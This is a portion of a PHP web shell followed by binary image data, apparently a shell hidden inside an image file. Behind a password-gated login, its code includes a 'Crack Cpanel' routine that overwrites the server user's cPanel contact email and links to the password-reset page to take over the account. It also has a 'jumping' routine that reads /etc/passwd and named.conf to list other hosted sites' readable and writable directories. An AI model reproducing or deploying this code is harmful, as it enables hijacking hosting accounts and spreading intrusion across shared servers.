|o= ~+: =o..: . :~ + ~=+ ~~:+:+o=~ :=: ==:.: +.~++. ..:...=: ..:+oooooooooo=o==+:=oo+======oooooooo|
|oo~.~.:.::.~~ ~... ..........+=+==.~oo+ ::..:.~.~+:.~~.:..::.~=:~++===+==oo=oo=o++oo========+++ooooo|
|ooo++oo=++::::::~~~::==::~::+o===++====+++==oo=o==ooooooo+==+:~:+++++++===========o=+=======oooooo++|
|===oooooo=+::~~~~~+:oo==+=oooooo========+=o=oo===ooooooooo=+.~:+=++=====++++==+=====ooo=====+=oooooo|
|=======ooooo+:==:+o==oooo=:+=+=====o===++=o=oo++++++=====+:~:::+:++++=+++======+=+===+=======ooo=+=o|
|oo===+++==o=~:==o=oo===o===+===+++=======ooooo====+=+++:~~~::~~::::~:::::::::::+::+=+++====+oooooo++|
|oo=oooo=++++:~~+::+===o=oooo=====o=ooooo==ooooooooooo=:~~..~..~~~~~.~~~~~~~~:~~~~~::++:+++=ooo==oooo|
|o==oooo+:++:::++++++++++=o=ooo=o==ooooo=:++===ooooo==:~.......~..................~~::~:+++=oooo=+=oo|
|==ooo=+++::~+ooo==+===+++:+:+=oooooo=o=:+==+:+++=o==:.......~~:::~~~~.....~.......~~~~:::++oo=ooo=++|
|=ooo=:::::~+===oo=o======++++:+==ooooo==o==oo==+++++:~...~:+===+=+++++:~.~~~~~~~~~..~~:~+::+===+=ooo|
|ooo=:::::::==:+=====o=o=====++=======oooo==o==ooo==~~~..+======ooooo===++~.~~~:::~~:~~~~:~:::=o=++=o|
|oo=::++~:+==+++=o=+=oo===oo=oo==++++======oooooooo=....++:++=oo=oooooooooo=++::~.::~~~~~~~~:+==oo=++|
|=+++++~+=o====oo===oo==o====oo===o===++=+=====oooo:..:+=+=+:~:=oooooooooooooo===+:~::~~~~:++=+++=oo=|
|=++++++======ooo=oo==+=======+==oooooo==+=+==+==o=~.:==oooooo=:+ooooooooooooo=o===+::~~::++==o=++=oo|
|oooo====+=o=ooo==oo==ooo+o=+++=ooooooooooooo===+=:.+=+===ooooo=.:oooooooooooooo===+:::::++=+++==oooo|
|o==ooo==+o=ooo==oo=+ooo=oo==+=oooo=o=oooooooo=o=+~+==o=+++::====oooo=:~...:::+====++::::+==++::ooooo|
|+:::+:+++=ooo==oo+=ooo=ooo===oo=oo=o===ooooo==oo=+====oo==+:++oooooo++++====++::+++::::=ooooo+oooooo|
|~+===+=======ooo==ooo==ooo==ooo====ooo=ooooo=oooo==++==ooooo=oooooo==oooooooooo+++:~:+ooo=oooooooooo|
|:+==oo==oo=+==o==oo==ooo===ooooo==oooooooo==oooo=+=+==ooooo=oooooo====+::=oooo=++~~+oooo======oooooo|
|~::::==ooooo=o==========+=ooooo===ooooooo==oooo=+==:====o=oooooo=====o=++++===++~:=oooo=======o=o===|
|++::~:::++ooo==oo===oooooooooooooooooooo==ooooo=+==.oo=oo=oooooo==+==ooooo===++~:=oooo:~::==o=====o=|
|o==++:+~::::+=ooooooo=oooooooooooooooooo+ooooo==+=o~~=oooooooooo=====ooooo==+:+===ooo+:+~~=oooo=====|
|=oooo====+::~::++==oo=o====ooooooooooo==oooo======o=+:::+:~~+++=++=+=oo===+=:+ooooooo==:~=oooooooooo|
|:++==ooo=o==++:::::+======oo==ooooooo=====o==+=o=+o=oo=:~:+o: ~=oooooo=+++::+=+=o=oooooooo=o==o=oooo|
|:::::+=+o=o=====:::=o============+===oo====o==========oooooo=:..:++++:~:+++=o==o===+===ooooo==oooooo|
|++:+::::+:==o=o======ooo=+o==oooooooooo=ooooooo=++====o=:+==oo==+::::++++=oo=+=======++++ooooooooooo|
|oooo+=++:::::++=o=oooo==ooooooooooooooooooooo=======ooo+ .==o=====++:+=====+=======o==o=+==oooooo=+|
|oooooooo==::~:~:==oo===oooooooooooooooooooooo======ooo+ ~=oo==+++:++=ooooo+=o==o=======+=======oo==|
|oooooooooo+::::=ooo===ooooooooooooooooooooooo=+=====oo .=o==++++++==ooooo+=oooo=+o============+==oo|
|===o======::::=ooo====ooooooooooooooooooo=ooooo=======.~===+===+==+===oo=+=ooooo=o=..~:+======+oo=o=|
|oo========++:=oooo===ooooooooooooooooooooooooooo=+++=+=+++++++=++++++=oo=+=o=oo=o+ ..~:+===o=+=o==oo|
|oooo==++==o=+==oooo==oooooooooooooooooooooooooooo===+:::++++++++++==oooooo==oo=o=..~:::=oooo+oo++==+|
|oooooooo==++=+=ooo=+ooooooooooooooooooooooooooooooooo====+=++===oooooooooooo===o+.~:::==ooo+oo~..~++|
|o=oooooooo==++oo=o==oooooooooooooooooooooooooo=oooooooo==o=oooooooooooooooooooo=+::+:=o=oo+oo~.~~:+=|
|==oooooo=oooo==oo===ooooooooooooooooooooooooooooooo=ooooooooo=ooooo=ooooooooooooo=+++oooo==o:.~~:=o=|
|=ooooooooooo=o=o=o==oooooooooooooooooooo=ooooooooo=oo=o=oo=o=oo=o=oooooooooooooooooo=ooo+=o+:~~:+ooo|
|=ooooooooooo==ooo==+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+=oo=++:+oooo|
|ooooooooooo==oo====+oooooooooooooooooooooooooo=ooo=ooo=o=ooooooo=ooooooooooooooooooooooo=oo=o=+ooo=o|
|ooooooooooooo==oo==ooooooooooooooooooooooooooooooooooooooo=oooooooooo=ooooooooooooooooooo==+=+=oo===|
|ooooooooo=o=o=o====ooooooooooooooooooooooooooooooooo=oooooooo==o=ooo=oooooooooooooooooooooo=+===oo==|
|oooooooo==ooooo====oooooooooooooooooooooooooooooooooooooooooooooooo=oooooooooooooooooooo=oooo=+++=oo|
|ooooooo=o=o=oo====oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo=ooooooo===+=o|
|oooooooo=ooo=oo=+oooooooooooooooooo=====ooooooooooooooooooooooooo==ooo=oooooooooooo==oo==ooooo+=====|
|oooo===oo=oooo=+=oooooooooooooo==++==+=++++oooooooooooooooooooooooooooo=oooooooooo=o===o=ooooo=+=+==|
|oooo=o=ooo=o====ooooooooo=oooo++=++++++++==+ooooooooooooooooooo==oooooooooooooooo====oo=o=oooo=====+|
|ooooo=o=ooo===+oooooooo===++::==++=+++=+==+=+=====+===oooooooooooooooo=oooooooo=======o==oooooo=====|
|o=+=+======+++====o===+++++++++:++::++:::++++~:::++++:~+=o===========+===o===o=:++++=+++====oo=+++=+|
+----------------------------------------------------------------------------------------------------+
</pre>
<form method='POST'>
<input type='password' name='pw'>
</form>
";
session_start();
if ($_POST['pw'] == $MyPass) {
$_SESSION['login'] = $MyPass;
print "<script>window.location='?';</script>";
}
exit;
}
function perms($pausi_gan77)
{
$perms = fileperms($pausi_gan77);
if (($perms & 0xC000) == 0xC000) {
$f = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$f = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$f = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$f = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$f = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$f = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$f = 'p';
} else {
$f = 'u';
}
$f .= (($perms & 0x0100) ? 'r' : '-');
$f .= (($perms & 0x0080) ? 'w' : '-');
$f .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
$f .= (($perms & 0x0020) ? 'r' : '-');
$f .= (($perms & 0x0010) ? 'w' : '-');
$f .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
$f .= (($perms & 0x0004) ? 'r' : '-');
$f .= (($perms & 0x0002) ? 'w' : '-');
$f .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $f;
}
function crack_cpanel()
{
echo "<hr><br>";
echo '<style>.draw {
height:45px;
}
.wis{
height: 25px;
}.logo{ height:70px;}
input[type="email"] { border-radius:5px; border-bottom-color: blue; border-top-color: blue; padding: 10; }
</style> <center> <div style=" border: 7px double; border-color: #F90000;border-radius: 16px 16px 16px 16px;-moz-border-radius: 16px 16px 16px 16px;-webkit-border-radius: 16px 16px 16px 16px;height:auto;width:500px; background-color:black; color:white;"><br><h2>Crack Cpanel <br><br> <form action="#" method="post"> <input type="email" name="email" placeholder="Your Email" style="background-color: " /> <input type="submit" name="submit" value="Crack" style="background-color: transparent;font: 15pt cursive;color:#80D713;"/> </form> <br /><br /> </p> ';
$IIIIIIIIIIII = get_current_user();
$IIIIIIIIIII1 = $_SERVER['HTTP_HOST'];
$IIIIIIIIIIlI = getenv('REMOTE_ADDR');
if (isset($_POST['submit'])) {
$email = $_POST['email'];
$IIIIIIIIIIl1 = 'email:' . $email;
$IIIIIIIIII1I = fopen('/home/' . $IIIIIIIIIIII . '/.cpanel/contactinfo', 'w');
fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
fclose($IIIIIIIIII1I);
$IIIIIIIIII1I = fopen('/home/' . $IIIIIIIIIIII . '/.contactinfo', 'w');
fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
fclose($IIIIIIIIII1I);
$IIIIIIIIIlIl = "https://";
$IIIIIIIIIlI1 = "2083";
$IIIIIIIIIllI = $IIIIIIIIIII1 . ':2083/resetpass?start=1';
$read_named_conf = @file('/home/' . $IIIIIIIIIIII . '/.cpanel/contactinfo');
if (!$read_named_conf) {
echo "<h1>maaf dak pacak di akses ster</h1><br><br> </pre></center>";
} else {
echo "<center>SALIN INI STER TRUZZ GASS <BR><BR></center>";
echo '<center><input type="text" value="' . $IIIIIIIIIIII . '" id="user"> <button onclick="username()">SALIN TEXT</button></center> <script>function username() { var copyText = document.getElementById("user"); copyText.select(); document.execCommand("copy"); } </script> ';
echo '<br/><center><a target="_blank" href="' . $IIIIIIIIIlIl . '' . $IIIIIIIIIllI . '"><img class="wis"src="https://i.ibb.co/hgKSY0K/cooltext317065123408510.png"></a><br><br></center>';
;
}
}
}
function aksiJump($dir, $ip)
{
$i = 0;
echo "<div class='card container'>";
if (preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if (isset($_POST['jump'])) {
echo "<pre>";
foreach ($urls as $url) {
$url = str_replace(array(
"http://",
"www."
), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc, "r");
while ($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if (is_dir($dir_user) === true) {
$url_user = $dir_user . "/" . $url;
if (is_readable($url_user)) {
$i++;
$jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
if (is_writable($url_user)) {
$jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
}
echo $jrw . "<br>";
}
}
}
}
if (!$i == 0) {
echo "<br>Total ada $i KAMAR di $ip";
}
echo "</pre>";
} else {
echo '<center><form method="post">
List Domains: <br>
<textarea name="url" class="form-control">';
$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r");
while ($getss = fgets($fp)) {
echo $getss;
}
echo '</textarea><br>
<input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
</form></center>';
}
} elseif (preg_match("/vhosts/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if (isset($_POST['jump'])) {
echo "<pre>";
foreach ($urls as $url) {
$web_vh = "/var/www/vhosts/$url/httpdocs";
if (is_dir($web_vh) === true) {
if (is_readable($web_vh)) {
$i++;
$jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
if (is_writable($web_vh)) {
$jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
}
echo $jrw . "<br>";
}
}
}
if (!$i == 0) {
echo "<br>Total ada $i Kamar Di $ip";
}
echo "</pre>";
} else {
echo '<center><form method="post">
List Domains: <br>
<textarea name="url" class="form-control">';
bing("ip:$ip");
echo '</textarea><br>
<input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
</form></center>';
}
} else {
echo "<pre>";
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
while ($passwd = fgets($etc)) {
if ($passwd == '' || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font><br/>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach ($user_jumping[1] as $user_pro_jump) {
$user_jumping_dir = "/home/$user_pro_jump/public_html";
if (is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
if (is_writable($user_jumping_dir)) {
$jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
}
echo $jrw;
if (function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if ($domain_jump == '') {
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach ($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if ($user_jumping_url == $user_pro_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if (!$i == 0) {
echo "<br>Total ada $i kamar di $ip";
}
echo "</pre>";
}
echo "</div><br/>";
exit;
}
?>
-% %--------------------------------------------------���1������
����������������B�����!1AQa"q����#2BR���br���3�$���4s��������������������6�����!1A"2Qaq��B���#��3R�Sr����
��?��P�@�
RP�)�O3�
ei9�+m�1�m�]��d�.�7\�n��_eRy��Q��
7����$�" pz��U��c�;Ut<X'��
}���Q��~YmaU �)C�(�%�7�1<H5�C
�1�V�>>�h_%�r�:M\��!k0����א�����W�9��VN;M=3�0� ���@�Ƀl�pMv�P�
z�C�_���|���t)_�.�?OvY
@�h
h�
��NnOl���WL{`��¬�`�g{��
Dž�6p�
�j�2��ª%,F��D
}%��ڬ<�~�+���ثg�i�霡�@� ���=���
��x�k�������N~FO��� �%��\�/�d����_���b�j؍�H`t�
cK��f�
�z,�9=%�
�ƨ���/r��vwZ���b����
:4��I��z���$�c<�W�;%'
X��~B�͆��њz�<�}�c�j��8��9���ew��,TҘ��w}��F
�v�f/Ш^5rmE�t*�Y��3�wA�~<}��s-�
"jYL37u�1l���sO����;��W�_}�ЯT�I�������u������9X9 ��@� �d0P�������G�ߒ��v�j=7B��ױq��Ku�l�Ў��X7b�YDlP�d�#Q��k!�S��K}��e��_�˧�ZQ�g��C��Ћ�c�����_2Mw%��p� ፣����(3fܔ"_�7��U�5�載a}�K4�L��
�ݿ[#��3
`�/&� �am>^�����1I�jb��{vp^�u�'8�>��7����s��9{�
�z31��W��_f���/ݨal��t��|-�p�̋�~E��Ӻ
p��zfD�����P�D�vr��)��U�"*�gy��{G�ȯ�b
b�@� ����|'�3Y���!��N^��v��
�z~#ɹC��/�����,��@���{g�(�W���h�,�b������Xэ�nX
|Qa��M�d
q��
�;�.�$�Zc�y4�nl�_3�_�3]�k�qF�&d9��m߰����\�7m���=�V��鞌>��w���iv*���4��0�;Ɓp[m
lz�3�n,g5/��x=r�lyS������G����K
�h
˃rF�o C��� �boùN9��ο����C`[C��T�RD Ї�v&��po�Y����k��Ts���?���e
�;�N�,YF�EW�/%f�q3���S��@� ��ѶV�CJ������Թ�sܵ�=�@���~d(]suI��'a`�gWY5l��Djؓ��"{e�b1�d��me�O?T��ؗonp�f�9+t�Gӗ��L;��f�W�����#� 4���l���q
!���\���NJz)�-�r:�R��FP{^WՒ[uB�j#?�����R�����2��
��{sAQ��S����G%���Pl}���.��x�/6�#dc�{�>�cP:Q�\@�
�A��Ac�2I�ے�e�������������(
$tl�CIJ�'>�>���~J�~NN_�ȶFI�I�r|��qj�e���Oe��c�+��
��@l��j^��@h�hq�{���h*�W��'(�.�B��w
y
THJJ�>�}J
��J�j}4h&�}s�B�:-�oɧdW�rP�9.Y4lM�YDr��%
tW�p5m<�8269�:5�.q�h̩�rr$��a
��/k �c��Qm����x����+���ɾ
&m�1�t{w.�+�^�̞
C%9�!�Be=LN��
�?"9y���_t;O��(� :i�OEꢢ�q�
O��jpMR�\K�
��Z�J��E������8��hۿ|Dk;��&�
G�
���
�el���rm��ߺ�&�_FrY��ߺ�&�_Fp�'{~�)��?f"�
N�[&C$��/
����bUt��ŢW��{�.��7���9w
�3�u���Ѣ�8�Zk�[_5d�K*�E����/$�,I��j��c?�E�S��d
���
�g�����cs��8����9�M� ���y����}�Զz����RM�
w�P��[\�
"het�~�n� �Z8=�-W�
Z��gs���8�"�5�Jl���W
[���uB6
`[�x
s�[���w�:���A�
��p��
������C볗o�l�q��U^ �w5�
?%7�p^QE�!˟���a�� �%��Q��
�?��x�z�T�������q�V��~�_P�����N���
��9� %K]Qo�
�C%/���cy���
�#]�7}��o��6�����V#U~4T�~_�U���
k߅�:('TT�+����-��t�8����l[��n��y��v���P���i�3�[��A�D\���EV�h�F.�z��jC�i!s����I������v�V�?�
��1�4�
�xx���i-#@Z@ �q
��p|6J��@���� 8�O��$�
����.OHڰ��i{�}.C)�n����i�J�;����Q�|�M��i��Dr
�>����9����ZyR��|
�n�LA����w����ū
���H����
Ǫ��
ϰӺ������;qYV���F�4�F^[�[$����u�ć�r���X�����U��Gу{�߉;Ϥo�x���t���3Q�
��K�{2g��h��F����2��r��'�gJ���e��c�떬:���*8���6�-ׁ��]�]��(f?M&��*x���X�Z_R4�i���e�'�u�|qj<iԲ����t��- �d�ce�WH�A�����'{�_?�JBhxn
m���fO�H��
��duNL�1��aq�$7��Tf���9���x>&�t��N��'���L����qY
�e�
��I����
8�����`{��:�f�V�U
����6�6�f!���L�L�
��n�o����
�k�A*��2�]��hF��<
�������I�d��f��;M�z��࡚�7��-��âۊ-�N��kD��H��� {߂�].qpu�ė�<�T�R��>b�=�4��8�r���A��+Ү�AQ$�W����۵�>��&ݰycc �"�Y��*�V�{{�n�\�ܥ�ܻbo���8m5>�5�h��9w�?H�fhv�r�����ۋ�k�FW��dz�~
�c��_j)gf�w��~Ӛ��
�����;
��������6y�جZ�dp�`��=�
���B���v�aN�-s��9@��G l�q�y�݀m�2�@\����֙�R�����$ss
i���VME�
6i���{�+4�Xɴ� ��r@S6�6�JƗ��\�Hi�^� ��X2b��K#�{��HY07@L�&)����?�]�>���E�J��4Ϣ�p�4^���[Ogg�>o�L��ӝ�#�,�5���(��� �艂�2w6����
Y�+�C/�l�v'd䡧lr��
�H��KAu�h<l��5
�o�Z�y-p�� �/�� r
�h�ȧjuWu#�v��6�E�=���Z�(�E�聬�p����쾶�xg�=��KYt��]�� J���J��Y��m���@.~Lֻ_�v���8u��/��rΧ���
�4
�h���#k��M�O�Q��L�h�
��#8��j��Mܴ�,�k�Fk�[Fj��dq�#"M�s�<�nJ�u����w�o��Y��о۲48��ߗ�RD�f�-`����7]{p�c�jD�n���:���Z�װ<�b�XcFh
V:��f�d��~�w3[�f��̴�����d�\@{t��� (�w�0Z2O�`��>J�EZ}ȿ�gt{_�jUN�䪲�k��ͨ�)�������i$<H��-b
�
�?[���\/
��y�
��P퉎�Nj�+N�etn��289ϓz��A����
�)v�2$���i�h��s\-��
� �,'y����wf3�
�`��Ց����o���eˍ������x+�s!s]ͮi�i��7PͿ
����y-M
X�^ȶ�j�B�d�T�BV����c�Sq���#��b�_�kE��Se~>d�c���~�r��#�������^M�h"�4���'0�Ky
c�
"�!m����;��N�=GT2@��
5�+ڍ<p6�����
�Q�(Y��R ��4���2 �! +FS��4��e�`eKK��|
|�5Rx�K����'����49��hq#!�E�Ro
�,�ɤ_0���*���仑F�g$��V���
Lr����\ׁ���0:�c�|��[�̒ƸY���O��I3�p�F�
�&
����C
N9�v���#�m�]
����Q�4�l`9�_M
b��*1!�cFt�
W_~+e�V�
M���' ?�<��l�l�Fw�F\�gx���B�9v��U��C9���\I���E ��t�L�~Yp��]
Ma$��|�ݿN
�J�S*��f�� �
���N%}N�u�H*�iDw�|��mh�����YH�E�g5��u�ݿ�� =3yA�l����@��
����3@k�
���@q���xs�: ��Tn�O��E��L��a�5[�O()�>
�g�MOjZD�����}�2q �q�
Պm{ԙZ�}-��P��f8���v�;���=s٘$g�XqFT�Z���{엷1���߂hߢg�5������f��϶Mq�e�N@��[*���ݿZ�SQ�e{��A�M�|��J&�.m
j�0Y��s�T2���.2�;����Q��ti���*�1ăb2��D
B�$��%Ȫn�~!����qN�
&'
�&�+q�/���:E���
L��6��C%�����%�FmOiT�����-k��
�Ѣ�V{"�8M>�Ml�y��REi��t����� ��V��Ѹ=�-p������4M��Gn���p� d�j>*7�9.�
0̌x�r��6�]�Ȫr���#j��g�P�ԻzH#{��-���3겥(%�CӀҘ]�k��]���kطt�s�²I�uE�h�V�
a�%
�C\�-�V�b����+
�@�ر��\M���z�z+Bp�QD|
�����{�5�I�Dc�>τ}�~.��~j�x��r �%�b������zg��ȍ��#D,Ui���
1�M.�$k��(�=-�R���/#%.�9�N<3��x-��'��#W(���9b���rsl�� J�p��@l���pWI�w���9uU�Ȍ8\���-�:�����b������Q�T�垮��E+Q����&�#oU{
22��w)��~�� ����K�{�qJ-��#g��=�WB�����Ug?~K=�F�c��W6xӃ��.�M�m��P���5�F��=?@�Q�P��"��⮒�o��_��>C��e���y��-�rW����߿��P��Պ����'
�d�e����S��g���X����
��qVD
T��:5���l��yc*��q!Kdsr:�>�e.$>�SƏ�ʻ�/�:i��rn�$���d��t��ɠ ��R8��kA$��̕��rm9���j�v|2Β��խ��~
�~^�
ϥ�
[��{/̝lJ��K��jlՓV2����2���z|���1ʧ�Ϛ?�ٟ*�M�^O�_�=��~�gS���}�N��q<�y/|�YFNC/�E�:�
�~��_�g���1��G�_��p�eq�c�ǧ}Y��Z�f�A
K
0����� kBuq�ǽ�k�2^Ʃ<�Ud�>�����㏕(E����*��
Ӂ"��n�@;��N�Yy�����]���
��|k�_E�qԕe%�G+%/,��&���� ���6�2��E���-�������r�r;�l|
���t��AYb����j���;+cT5�{"Ds�#�z��Z���Aq��1�+�71��+=�5�9�k�,�IU��~k��xz�/�%���5Ǐc��M>xk��bEc��V���8�p���u�NM=�
}�:���B��Q��%���Ϭ�~�
�u/�_2����EE
!���.�O��)k�o��Zq�����e�u��kp#�^��֣
��JR�Nr�6.�*�Q�k����]ǹω�Y�y�W̿�<l�rZS�?�u�����sT�[_���E��եI��jD�h� ����j
��ɚuw�S.���s�~
����e�?�
�X�g�l�,�EJ�&�Z�F�:�09w���(���>
kH�s�{K��9��U;�㑽Clr�a��s5��gz�zO懏�>[���
��%�����y=�/G�G��^F��Lj�[#n!Q�ê�V;H���~4��n-�Zx���^
7
��oUͳ��،��@YK$���jM����V�Ŏ�
~J7�cp����n�P����������t���B�3u�h�c،�>i.vyh�:.lh�1P��[����&A� �����4��Mg]�g3�t\[�ﱳ��+�lX�����Dtʦ�o�.�Dl�
U�A�����?t
5SN.�w3��b̿ҋ��b���` Kg�����,թ;�7j3��t^���-��ܞ� ��x��YuG
8ϙI��K���K_g5
Q|ҍ��pk��-k�@
ܸ�=3��W]�
1��z��-�#���<62�����%��IXZ"df�1�� E��QĻ�]'���gY�U%�buԮ�G��X��Vz�ƍ��
,�]SqJUɚDi"�>Ib2�*v"x�*�f��.KU�����@I`4���
���N;(o�mm�>�����>˗�
�B�L:srY5l����6k�V�#��?%ҩpx��|z��[�V��Y�������ö7G��E���"��Q7 � M�ϧ&�eo�)�̩�}�V(V��~ȃ��||��>�ݰ��辑��
ZcT|/�Ϗu
�3r%|��콑{��!%3��Hda9]�im��֟S�|���ެ3kM��Z�r��eΙl{]oϒ��Y�EK�#@��#]�P�ol�Em�aQZ٪_#~� �k��/�t\aaWT�o-}U��e%�*�̭5z�"T4�U��$]`\��U�bP@��<.{�Ƃ\��5.&��(
�&̚+o�zG����
xA�z�\��p�z����K$>b�z�s;�ս-���Z�
,�+x�����PZ��r��k
�,��.�N��l�e?�E��ӊ��Y��?�&P�E�q\�&�
F9
���⢵�A9�M�M���ULF&�x ��RM�t���K��.${R��.�W��$I�N\91��'2u�E��ߓ?���E6m��U�%CIܫX�b��¹��tZ�h���@
?f��C���(��9_75�a��9���-���m�A0G^ ���u�kRE�l����T�����W*;/��d�
��_�<8yL�W��%-J)���]ٛ���X۠
}I%���
v"�[��C����dn�����199=N۾ߑ���z��\+��p���u�,�K
J���Ř�,d��Rl�G%�V��M�hٸ��Pɛ$6�ʼ�,P�G*�d�C9��X��,Q;�W6�w2�V�����@];"�>��Eqv�
;������ DҴ�[�/�?� =��"=
�
;�cA
��9��t����+��
`�xH ڀ�b�8�,��M��ܟ��l
�)vv';�����@0�
�|�S
�EK�'"�v�2���H=ɦFwr���q��-\��#�9j�̤!#��$I
$r�96K5���X�:�n
�u��\}�j�0 ��7�����T�S���M�;��@n��U� +{E�@d��a��G,�-o�
�Y��]J�ᢤ��n�t�.
�
6E2���ؙm��=3��;�2�VQK2�; F�̪��h�e,�U'=�F#�K�:�r�d�@
Ӱ �*53���F-�'��S;#Б�l~H�@z����8�Nڬ$g�E�m u;��
��Us
[Z �r/�����U���g:��[9��st�,[L��3 �
��U}B^��=C=�rT(�i���ғ��Sl�GBe��qoɶМ���KF�c7��G�
���K�7l5rS��N��FH�
� �� >��}��[1v�гu���
��1�t&�n᧐6N{���`�\b)�i�`�iV$� }ۃ�U�x�l������]L95"��h���t-���.��l�0La���*���o�;�,c��d�=e:�R!s<|KY�!��]S�m�h��
)�u�����J=�j�� j�#U��
�6���ȖUJ>FjB3���
�!ii �#"�y�7N�{Kl�
z�u
'q�&�5
7���
�4m��f9�x�>�b��8�ɩp��:g�-ɷ
��
�&�����u>�,��2��9�NVV*��m�Nz��^�Nd�����JZ�H��n�T���*�}�;�-��"k%\����֊�+���uM)rO8����:+��,9�l�)�
�8pV��I�8)
AE�ޫj�ى[�
V����ͱp�A�\G
�[�꼟Z΅���^
�d�,w]@,Aj��m3�8&�3]����4]Z,�\����_:��� =@Z6so�h�-������;P���S�
L���C�
�v�`
���m� 7�
\���ӳ��nLc�)5d�Nd�/�i}m�RR�駷�I�b�=Kd�"�ꇪȱCU�r�Ol�\t�hf�x>����4
�~�p��۱ۮ�ӥ�c���6c��#܉n鐹nLVl&M7o�G��
��5�k�G:]+"/��!�
������������b־��DI_I�O��\���}�B�A����;������s���j�}�n_r�6
���GQX���n��
���;��?%��|�������@� �6��o�A��\��v�~�7Z���&d�D#�rd���ѩĄ��H��a<���D�W*�_g��D�ܮc{e�
��`{Gh��� d٢ J�8
�<�Um���?��\�'��~��!�̫d��A�Qs�
����U]��mdC�C�\H�p�5�� c=�z<N٭
I6�������1�Db��}�ч"S��3�p8����
}u>������L��� @� ��wl�
�|�/GӠ�$����{�'�یQA���8�c9�qU'\�4d�sR�R��N��4fDW��9:��vE.ih۠$�X�lAs�8ui�Ђ>j;+S&��\���(�/l��l�G� �ͤ����t+�3�X���nNk�z���Z����*q6�7�$ٟ!�I
�d6\�*�,��f�Y��:�<U�EEh�NNOdj���@~ٌϣl�7v���6�����\�ꑢ�J� ��m]��G�lAj3y��^��#d{�����JRZ:˚�H�o3�⠱�1��T�\��[\��$Q$_� 5����t�
r3P��@P
� 3��ym�|���ӇГ՟�g4�q��\y�I�+t��h�~D� ���@j�0Ki�h�����\��sg^���%j������Cl��b��h{�Z7��V��Fͅr.
��^��yi|Z��O�㿗hc6���-����/�$�j��2������fm���"h��W�@W7��0�Y�j���@� ���@�Q�ѩ Sd|Kfс�����z.%��gz��"�O�\f���
�aV
)�6�
B��H�ID��1ؕr����b-��z�r���:���@� ���@�� �}
��~kY���.��,�'~��^�dm�hX��{X[d5�~�W!oi�2��X+����� f�m
���
�E|�
b@� ���@� q�t�5��Sѣ��0
A�<�*��g^�T�p��l5U�
jaQ�e�ʬð�b��u��'=��G��a"��Zں��P��-��Ev��Q��!怀�@� ���@!��N�ӭ�
E�J;!܉*����:�H/�'@w^<��FP��'(���7�'~!7���aĒ�+dr��\K�-��r.#�VaW�*Yn�Ex���@� ���@� ���`�|�U�
_����
��R���w̫��
9%uY*
���@� ����